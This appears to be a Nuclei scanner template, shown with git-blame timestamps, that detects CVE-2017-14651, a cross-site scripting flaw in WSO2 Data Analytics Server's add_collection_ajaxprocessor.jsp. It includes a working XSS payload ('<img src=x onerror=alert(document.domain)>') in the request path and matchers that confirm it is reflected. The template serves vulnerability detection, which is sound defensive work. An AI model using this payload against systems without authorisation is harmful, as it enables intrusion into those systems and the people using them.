2021-08-06 14:46:35 +00:00
id : CVE-2017-14651
2021-08-05 16:59:36 +00:00
info :
2022-09-09 17:34:37 +00:00
name : WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
2021-08-05 16:59:36 +00:00
author : mass0ma
severity : medium
2022-04-22 10:38:41 +00:00
description : WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
2021-09-10 11:26:40 +00:00
reference :
- https://github.com/cybersecurityworks/Disclosed/issues/15
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
- https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html
2022-04-15 16:39:44 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-14651
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score : 4.8
cve-id : CVE-2017-14651
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00144
cpe : cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wso2
product : api_manager
tags : cve,cve2017,wso2,xss
2021-08-05 16:59:36 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-05 16:59:36 +00:00
- method : GET
path :
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-08-05 16:59:36 +00:00
words :
- "<img src=x onerror=alert(document.domain)>"
2021-08-06 14:46:35 +00:00
- "Failed to add new collection"
2021-08-05 16:59:36 +00:00
condition : and
2021-08-06 14:46:35 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-08-06 14:46:35 +00:00
words :
- "text/html"